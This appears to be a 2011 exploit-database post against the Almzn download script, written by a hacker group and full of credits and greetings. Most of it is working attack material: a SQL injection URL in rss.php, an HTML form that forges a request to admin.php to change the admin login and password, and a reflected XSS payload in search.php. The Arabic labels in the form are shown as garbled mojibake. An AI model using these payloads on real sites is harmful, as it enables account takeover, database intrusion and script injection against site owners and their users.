Home / exploits Almzn Cross Site Scripting / SQL Injection
Posted on 14 October 2011
============================== Almzn dir Mullti Vulnerability ============================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0 0 . .--. .--. .---. . 1 1 .'| ) ) / | 0 0 | --: --: / .-.| .-. . . 1 1 | ) ) / ( |( ) | | 0 0 '---' `--' `--' ' `-'`-`-'`-`--| 1 1 ; 0 0 Site : 1337day.com `-' 1 1 Support e-mail : submit[at]inj3ct0r.com 0 0 >> Exploit database separated by exploit 1 1 type (local, remote, DoS, etc.) 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1 ####################################################### # Vendor: http://www.almzn.net/ # Date: 2011-07-27 # Author : indoushka +++=[ Dz Offenders Cr3w ]=+++ # KedAns-Dz * Caddy-Dz * Kalashinkov3 # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz # Contact : ind0ushka@hotmail.com # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr ######################################################################## # Exploit By indoushka ------------- SQL: http://localhost/download/rss.php?catid=%24%7binjecthere%7d ---------------------------------- Add Admin <form method='POST' action='http://localhost/download/admin/admin.php?action=admin_pass'> <table class='clatable' border='0' width='100%' cellspacing='0' cellpadding='0'> <tr> <td class='haed' colspan='2'> <p align='center'>ÊÚÏíá ãÚáæãÇÊ ÇáÏÎæá</td> </tr> <tr> <td>ÇÓã ÇáãÓÊÎÏã : </td> <td><input type='text' value='admin' name='n_admin_login' size='38'></td> </tr> <tr> <td>ßáãÉ ÇáãÑæÑ : </td> <td><input type='password' name='n_pass_login' size='38'><font class='aaa'><small> ãáÇÍÙÉ : ÇÊÑß ÇáÍÞá ÝÇÑÛÇ ÅÐÇ ßäÊ áÇ ÊÑíÏ ÊÛííÑ ßáãÉ ÇáãÑæÑ </small></font></td> </tr> </table> </table> <p align='center'><input type='submit' value='ÊÚÏíá' name='B1'><input type='reset' value='ÇáÇÝÊÑÇÖí' name='B2'><br> </p> </form> </td> ------------------------------------------ http://localhost/download/admin/ckeditor/ XSS : http://localhost/download/search.php/%27onmouseover=prompt%28771%29%3E Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel =========================== special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te ---------------------------------------------------------------------------------------------------------------------------------
